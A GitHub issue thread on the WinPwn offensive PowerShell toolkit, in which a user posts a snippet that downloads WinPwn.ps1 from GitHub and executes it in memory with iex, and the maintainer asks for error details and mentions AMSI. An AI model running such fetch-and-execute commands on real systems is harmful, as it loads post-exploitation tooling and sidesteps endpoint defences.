### ISSUE TITLE
CAN'T INVOKE EXPRESSION IN FUNCTION WINPWN.

### ISSUE THREAD

**Issue by Krip4us** [S3cur3Th1sSh1t/WinPwn#20]
to run and download correctly all the script please type: 

iex (new-object net.webclient).downloadstring("https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1");
(Invoke-WebRequest -Uri "https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1" -UseBasicParsing | select content) |
    ForEach-Object{
        if ((Get-ExecutionPolicy) -eq 'RemoteSigned') {
            $_.content | Out-File "$env:TMP/WinPwn.ps1";
            cd $env:TMP;
            Invoke-Expression "$env:TMP/WinPwn.ps1";
            WinPwn
        }
    }

**Comment by S3cur3Th1sSh1t** [comment]
I don't see any question, error message or screenshots. Maybe it's AMSI, maybe something else. :mag: Some more information please :+1:

**Comment by S3cur3Th1sSh1t** [comment]
Seams like a low priority problem.
